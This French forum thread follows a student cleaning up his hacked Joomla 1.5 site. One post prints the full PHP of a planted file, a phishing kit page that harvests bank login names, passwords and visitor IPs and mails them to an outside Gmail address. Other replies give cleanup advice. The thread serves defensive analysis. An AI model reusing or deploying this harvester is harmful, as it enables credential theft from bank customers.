IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Nettoyage de site hacké - Joomla


Sujet :

Sécurité

  1. #1
    Candidat au Club
    Profil pro
    Inscrit en
    Septembre 2010
    Messages
    7
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Septembre 2010
    Messages : 7
    Points : 2
    Points
    2
    Par défaut Nettoyage de site hacké - Joomla
    Bonjour,

    Tout d'abord je vous explique un tout petit peu la situation...

    Le site internet en question a été réalisé il y a un certain temps avec Joomla 1.5....
    Or n'ayant jamais été mis à jour, celui-ci à fini par être victime d'attaques.

    Comme je ne souhaite pas payer 3000.- pour un nouveau site et que de plus,
    je fais quand même des études en informatique, j'ai décidé de m'en occuper moi.

    J'espère donc pouvoir compter sur votre aide ! :-)


    1ère chose : j'ai fait un premier scan avec sucuri.net dont voici le résultat... http://sitecheck.sucuri.net/results/www.sinanju.ch
    Y'a du boulot vous croyez...?

    2ème chose : Fichier joint : j'ai trouvé ce fichier (parmi d'autres suspect) ajouté récemment sur le serveur, quelqu'un peut me renseigner sur ce que c'est??
    log.php

  2. #2
    Membre émérite
    Avatar de cavo789
    Homme Profil pro
    Développeur Web
    Inscrit en
    Mai 2004
    Messages
    1 756
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Mai 2004
    Messages : 1 756
    Points : 2 990
    Points
    2 990
    Par défaut
    Bonjour

    Je te suggère d'aller lire la page ci-dessous afin d'avoir un grand nombre d'explication et d'aide qui te permettront de nettoyer ton site :

    Votre site a été hacké, que faire ? : http://www.aesecure.com/fr/blog/site-hacke.html

    Concernant ta deuxième question, je n'ai pas ouvert le fichier car, très probablement, il est malsain et je n'ai pas envie que mon antivirus hurle

    Bonne journée.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be

  3. #3
    Candidat au Club
    Profil pro
    Inscrit en
    Septembre 2010
    Messages
    7
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Septembre 2010
    Messages : 7
    Points : 2
    Points
    2
    Par défaut
    Hello cavo,

    Merci pour la piste, je vais donc suivre les conseils qu'ils donnent là-dessus !

    Pour ce qui est du fichier, j'aurais dû y penser, effectivement... voici donc le code qu'il contient :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    <?
    
    $ip = getenv("REMOTE_ADDR");
    $message .= "----------------------------Scotia Result Login---------------------------\n";
    $message .= "ScotiaCard: ".$_POST['username']."\n";
    $message .= "Password: ".$_POST['password']."\n";
    $message .= "IP: ".$ip."\n";
    $message .= "---------------Created By WeStGiRl0005------------------------------\n";
    
    
    $recipient = "1samhigs@gmail.com";
    $subject = "TIMBER";
    $headers = "From: APP";
    $headers .= "MIME-Version: 1.0\n";
    mail($cc,$subject,$message,$headers);
    	 if (mail($recipient,$subject,$message,$headers))
    	   {
    		   header("Location: confirm.html");
    
    	   }
    else
        	   {
     		echo "ERROR! Please go back and try again.";
      	   }
    
    ?>

  4. #4
    Membre émérite
    Avatar de cavo789
    Homme Profil pro
    Développeur Web
    Inscrit en
    Mai 2004
    Messages
    1 756
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Mai 2004
    Messages : 1 756
    Points : 2 990
    Points
    2 990
    Par défaut
    Ce fichier génère un mail envoyé à une adresse email (mentionnée dans le code).

    Elle récupère l'IP de ton visiteur et tente de récupérer son login et mot de passe. Je dis tente car cela n'aboutira jamais sous Joomla qui est mieux sécurisé que ce croît ce code php vraiment idiot et ridicule. Tu peux sans crainte le supprimer; il n'a rien transmis de vraiment important; juste ennuyeux mais c'est tout.

    Note que maintenant, vu que ce fichier a pû être déposé, c'est donc que ton site est failible ==> cherche par où le gars est rentré (le log des accès Apache est une source d'information) et sécurise ton site.

    Tu trouveras quantité de conseils dans le document que j'ai mentionné plus haut.

    Bonne chasse aux portes ouvertes et bonne soirée.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be

  5. #5
    Candidat au Club
    Profil pro
    Inscrit en
    Septembre 2010
    Messages
    7
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Septembre 2010
    Messages : 7
    Points : 2
    Points
    2
    Par défaut
    Bonjour,

    Je peine à remettre mon site en état mais j'ai pu récupérer à peu près tous les textes des articles.
    Je pensais donc faire au plus simple ; tout effacer et repartir à zéro en installant Joomla 2.5.

    Seulement je voulais encore savoir s'il serait possible de récupérer le Template (j'imagine que oui) de mon site précédent et comment ?!

  6. #6
    Membre émérite
    Avatar de cavo789
    Homme Profil pro
    Développeur Web
    Inscrit en
    Mai 2004
    Messages
    1 756
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Mai 2004
    Messages : 1 756
    Points : 2 990
    Points
    2 990
    Par défaut
    Citation Envoyé par Epistik Voir le message
    Seulement je voulais encore savoir s'il serait possible de récupérer le Template (j'imagine que oui) de mon site précédent et comment ?!
    Tu copies le dossier /templates/ton_template du site virusé vers le nouveau puis tu vas dans l'administration de Joomla -> Extensions -> Installer et tu fais un "découvrir".

    Maintenant soit bien conscient que lorsqu'un site Joomla est virusé, c'est la plupart du temps dans le dossier /template/ton_template que se trouve la bestiole.

    Le mieux serait de récupérer une version propre et saine de ton template.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be

  7. #7
    Candidat au Club
    Profil pro
    Inscrit en
    Septembre 2010
    Messages
    7
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Septembre 2010
    Messages : 7
    Points : 2
    Points
    2
    Par défaut
    Alors dans mon dossier /templates, j'ai :

    • Index.html
    • system
    • nomTemplate
    • ancien-nomTemplate


    Or quand j'accède à "nomTemplate", j'obtiens :
    Réponse : 550 Can't change directory to omTemplate: Permission denied
    Erreur : Impossible de récupérer le contenu du dossier
    Saurais-tu comment cela est possible? Le dossier est-il simplement inexistant ?

    Par contre je pense que l'ancien est sain, donc j'essayerai avec celui-là !

    Je profite encore de poser un autre question : À l'installation de Joomla, il faut entrer le nom et les accès à la base de donnée du serveur. Or je ne les connais pas, est-ce possible de les retrouver sans devoir demander à l'hébergeur ??

    Merci pour toute ton aide jusque-là !

  8. #8
    Membre émérite
    Avatar de cavo789
    Homme Profil pro
    Développeur Web
    Inscrit en
    Mai 2004
    Messages
    1 756
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Mai 2004
    Messages : 1 756
    Points : 2 990
    Points
    2 990
    Par défaut
    Citation Envoyé par Epistik Voir le message
    Réponse : 550 Can't change directory to omTemplate: Permission denied
    Erreur : Impossible de récupérer le contenu du dossier
    Saurais-tu comment cela est possible? Le dossier est-il simplement inexistant ?
    Vérifie tes chmods (permissions du dossier). Tu devrais avoir 755. Si ce n'est pas le cas, adapte.

    Citation Envoyé par Epistik Voir le message
    Par contre je pense que l'ancien est sain, donc j'essayerai avec celui-là !
    Tu "penses" ou tu es sûr ? Parce que je te garantis que les hackeurs attaquent systématiquement le dossier templates.

    Citation Envoyé par Epistik Voir le message
    Je profite encore de poser un autre question : À l'installation de Joomla, il faut entrer le nom et les accès à la base de donnée du serveur. Or je ne les connais pas, est-ce possible de les retrouver sans devoir demander à l'hébergeur ??
    Non, il faut demander. C'est un minimum à avoir pour installer un CMS; Joomla! ou pas.

    Bonne journée.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be

  9. #9
    Candidat au Club
    Profil pro
    Inscrit en
    Septembre 2010
    Messages
    7
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Septembre 2010
    Messages : 7
    Points : 2
    Points
    2
    Par défaut
    Pfiouh! Après quelques efforts, j'ai récupéré tous les accès nécessaires.

    Mais un problème persiste : j'ai un répertoire inatteignable dans le dossier "Templates". Le chmod est à 00 et si je tente de modifier ça j'obtiens :

    Impossible d'exécuter la commande chmod 0444 /web/templates/nomDuTemplate. Remarque : les commandes CHMOD sont uniquement possibles sur les serveurs FTP Unix, non sur les serveurs FTP Windows
    Une idée ??

  10. #10
    Candidat au Club
    Profil pro
    Inscrit en
    Septembre 2010
    Messages
    7
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : Septembre 2010
    Messages : 7
    Points : 2
    Points
    2
    Par défaut
    Mon site est en ligne ! Merci pour l'aide !

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Devis pour la refonte d'un site avec Joomla
    Par ntouhami dans le forum Devis
    Réponses: 12
    Dernier message: 26/02/2008, 20h55
  2. [Joomla!] mises à jour des sites web: joomla
    Par rvfranck dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 6
    Dernier message: 07/04/2007, 02h15
  3. [Joomla!] Creation Site Sous Joomla
    Par Neofunk dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 1
    Dernier message: 13/03/2007, 21h52

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo